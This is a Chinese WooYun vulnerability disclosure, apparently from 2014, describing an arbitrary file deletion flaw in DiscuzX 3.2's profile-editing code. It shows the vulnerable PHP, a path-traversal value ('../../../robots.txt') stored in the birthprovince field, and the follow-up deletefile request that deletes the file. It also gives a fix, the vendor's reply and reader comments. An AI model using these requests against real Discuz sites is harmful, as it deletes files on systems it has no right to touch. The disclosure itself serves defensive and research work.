当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(156) 关注此漏洞

缺陷编号: WooYun-2014-65513

漏洞标题: DiscuzX 任意文件操作漏洞

相关厂商: Discuz!

漏洞作者: Map

提交时间: 2014-06-19 19:10

公开时间: 2014-09-17 19:12

漏洞类型: 任意文件遍历/下载

危害等级: 高

自评Rank: 12

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

47人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-19: 细节已通知厂商并且等待厂商处理中
2014-06-20: 厂商已经确认,细节仅向厂商公开
2014-06-23: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-17: 细节向公众公开

简要描述:

DiscuzX 任意文件操作漏洞

详细说明:

漏洞实际上是任意文件删除,但是由于删除的函数容易被定位,所以不方便写在简要描述或标题内。



昨天下载DiscuzX 3.2的代码,在



source/include/spacecp/spacecp_profile.php 中找到以下代码:

code 区域
if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
foreach($_GET['deletefile'] as $key => $value) {
if(isset($_G['cache']['profilesetting'][$key])) {
echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);
@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
@unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
$verifyarr[$key] = $setarr[$key] = '';
}
}
}



往上跟发现$_GET['deletefile']没有任何处理,$space[$key]来自



code 区域
$space = getuserbyuid($_G['uid']);
space_merge($space, 'field_home');
space_merge($space, 'profile');





所以我们需要在$space变量中找到一个存在需要被删除的文件的位置,我用的字段是birthprovince

code 区域
我们第一次在birthprovince里加上我们要删除的文件然后保存资料,下次我们提交$_GET['deletefile'][birthprovince],那么$space[birthprovince]指向的文件就会被删除。



也就是说,我们提交birthprovince为../../../robots.txt





保存完之后,数据库里的$space['birthprovice']会成为../../../robots.txt,当我们提交$_GET['deletefile'][birthprovince]的时候,会去删除$space['birthprovice']指向的文件。



操作步骤:



那么登陆后提交:

birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0

注意,85cf7ef0是你的formhash。



http://localhost/dx/home.php?mod=spacecp&ac=profile&op=base

提示保存成功



这个时候你的birthprovince就是../../../robots.txt,产生的$space['birthprovince']就是../../../robots.txt了。



接下来我们来进行参数的操作,提交:



birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0





http://localhost/study/dx/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa



OK,文件就被顺利删除了。

漏洞证明:

如上面所述。

修复方案:

检查下deletefile指向的key是不是自定义字段里允许FILES的字段。

版权声明:转载请注明来源 Map@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-20 10:24

厂商回复:

感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-06-19 19:16 | YouYaX(乌云厂商)
    0

    神奇神奇

  2. 2014-06-19 19:16 | 筱阳 ( 路人 | Rank:0 漏洞数:4 | 俺是小彩笔。)
    0

    坐等 神奇的路人甲

  3. 2014-06-19 19:21 | mu0u ( 路人 | Rank:2 漏洞数:1 | 先做人,后做事。)
    0

    神奇的路人甲

  4. 2014-06-19 19:49 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )
    0

    雷劈吗?

  5. 2014-06-19 20:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    那不是可以拿shell?

  6. 2014-06-19 20:16 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
    0

    火前留名呢,这是要发呀

  7. 2014-06-19 20:55 | 神奇的路人甲 ( 实习白帽子 | Rank:67 漏洞数:18 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
    0

    神奇的路人甲

  8. 2014-06-19 21:45 | 逗b炮 ( 路人 | Rank:20 漏洞数:1 | muyou)
    0

    坐等忽略!

  9. 2014-06-20 10:14 | 沙加 ( 路人 | Rank:8 漏洞数:1 | 专注漏洞三十年)
    0

    貌似恨屌的樣子

  10. 2014-06-20 10:25 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)
    0

    默默mark

  11. 2014-06-20 12:17 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    0

    感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

  12. 2014-06-23 10:33 | 疯子 ( 普通白帽子 | Rank:259 漏洞数:45 | 世人笑我太疯癫,我笑世人看不穿~)
    0

    感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

  13. 2014-06-23 10:45 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)
    0

    神器

  14. 2014-06-26 19:41 | 猛虎 ( 路人 | Rank:21 漏洞数:4 | 分享快乐与痛苦。)
    0

    听起来,很好,关注

  15. 2014-06-27 18:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    为什么不拿shell呢

  16. 2014-07-03 16:23 | 西顾 ( 路人 | Rank:0 漏洞数:1 | 保守主义,展元爱好者,啥都不会)
    0

    mark

  17. 2014-08-20 14:43 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)
    1

    多方准备啥时候发补丁,外面文件都被删完了。

  18. 2014-09-17 19:54 | Suner ( 路人 | Rank:21 漏洞数:2 | 再读小学生)
    0

    神奇的进攻思路

  19. 2014-09-18 08:40 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)
    0

    都是一些神人

  20. 2014-09-18 10:09 | Seven.Sea ( 普通白帽子 | Rank:118 漏洞数:28 | 唯有安全与美食不可辜负。)
    0

    默默mark,脑洞大开的进攻思路

  21. 2014-10-08 15:05 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @Hmily 可能因为删文件不废电

  22. 2014-11-24 16:09 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    1

    貌似一直没发补丁?

  23. 2014-11-24 16:15 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)
    1

    @D&G 偷偷发了,官方没法公告,只在原来的版本上修改文件,外面基本全部没有修复,搞个exp一扫一片一片的。

  24. 2014-11-24 16:49 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    1

    @Hmily 我在http://www.discuz.net/thread-3457145-1-1.html 这里下载的X3.1 完整版是存在漏洞的。然后下了最新的0630补丁看了下,也没看到有修复spacecp_profile.php这个文件。 是在完整包上直接改文件了么?

  25. 2014-11-24 16:53 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)
    1

    @D&G 3.1早不管了,N多0day都没修复,只有3.2这里的 http://download.comsenz.com/DiscuzX/3.2/ 修了。

  26. 2014-11-24 16:56 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    1

    @Hmily 恩,谢了。3.1已经不管了啊。。。。这可怎么过。

  27. 2014-11-24 19:54 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)
    1

    @D&G 你是要自己修?自己diff下就知道怎么修了啊。

  28. 2014-11-25 08:34 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    1

    @Hmily 恩。自己修,按照3.2的方法修的。感觉discuz有点坑。

  29. 2014-11-26 23:19 | 我还爱 ( 路人 | Rank:0 漏洞数:1 | 虚心学习)
    1

    @D&G 大牛你好,我测试的程序跟你下载的一样,但是我没有成功删掉文件,只是最后显示了success,不知道为什么,

  30. 2014-11-27 08:41 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    1

    X3.1 ?如果是没打过补丁的,应该是可以的。多输出调试一下看看吧。

  31. 2015-06-07 00:11 | lansebird ( 路人 | Rank:0 漏洞数:1 | 飞跃马尔代夫)
    0

    路过,学习学习前辈

  32. 2015-11-02 09:54 | 大亮 ( 普通白帽子 | Rank:359 漏洞数:70 | 慢慢挖洞)
    0

    很神器的进攻思路....

登录后才能发表评论,请先 登录